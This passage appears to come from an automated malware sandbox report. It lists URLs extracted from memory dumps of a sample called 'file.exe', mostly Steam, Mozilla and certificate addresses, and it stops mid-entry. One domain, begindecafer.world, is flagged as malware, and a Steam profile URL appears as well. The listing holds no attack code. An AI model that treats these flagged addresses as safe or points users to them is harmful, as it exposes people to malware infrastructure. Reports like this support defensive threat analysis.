                                                                      https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackfile.exe, 00000000.00000003.1068212000.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164445689.0000000000AEC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164596542.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1103118777.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005433000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132235158.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1071204186.00000000053F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://community.cloudflare.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&amp;l=efile.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132615784.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164596542.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193503319.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196473496.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187422565.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196614765.0000000005436000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://s.ytimg.com;file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_co?file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDfile.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132615784.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://steam.tv/file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://begindecafer.world:443/QwdZdffile.exe, 00000000.00000003.919517641.0000000000A74000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  		unknown
                                                                                  https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=V4P4q3q732file.exe, 00000000.00000003.1137069557.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1103118777.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196455579.00000000053E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193193906.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919517641.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187388354.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1194643055.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187351626.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187295208.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=sd6kCnGQW5Ji&amp;file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132615784.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164596542.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193503319.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196473496.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187422565.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://community.cloudflare.steamstatic.com/public/javascript/applications/community/Ffile.exe, 00000000.00000003.1068212000.00000000053E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000003.1068212000.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164445689.0000000000AEC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196455579.00000000053E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919517641.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1137219703.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1071204186.00000000053F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://steamcommunity.com/jfile.exe, 00000000.00000003.1164445689.0000000000B04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://store.steampowered.com/points/shop/file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.954648651.0000000005419000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.1073638787.00000000054ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.1073638787.00000000054ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://sketchfab.comfile.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://steamcommunity.com:443/profiles/76561199822375128file.exe, 00000000.00000003.1136822746.0000000000A74000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://lv.queniujq.cnfile.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://community.cloudflare.steamstatic.com/1file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196614765.0000000005436000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.1074840267.000000000570D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://www.youtube.com/file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://steamcommunity.com/Zfile.exe, 00000000.00000002.1194679901.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193577853.0000000000B04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&amp;l=englifile.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132615784.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164596542.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193503319.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196473496.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187422565.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=englifile.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngfile.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://community.cloudflare.steamstatic.com/public/javascript/apfile.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=jfdbfile.exe, 00000000.00000003.1137069557.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1103118777.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196455579.00000000053E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193193906.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919517641.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1137219703.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187388354.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1194643055.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187351626.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187295208.0000000000A98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://www.google.com/recaptcha/file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://checkout.steampowered.com/file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28bfile.exe, 00000000.00000003.1137069557.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1103118777.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196455579.00000000053E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193193906.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919517641.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187388354.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1194643055.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187351626.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187295208.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132235158.00000000053E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&ampfile.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pngfile.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://gemini.google.com/app?q=file.exe, 00000000.00000003.954648651.0000000005419000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://steamcommunity.com/zfile.exe, 00000000.00000003.1187650092.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187185183.0000000000B04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://store.steampowered.com/;file.exe, 00000000.00000003.919467475.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1103138015.0000000005403000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1103138015.00000000053F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1136696312.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132615784.0000000005406000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1071204186.0000000005406000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1103138015.0000000005406000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1136637956.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 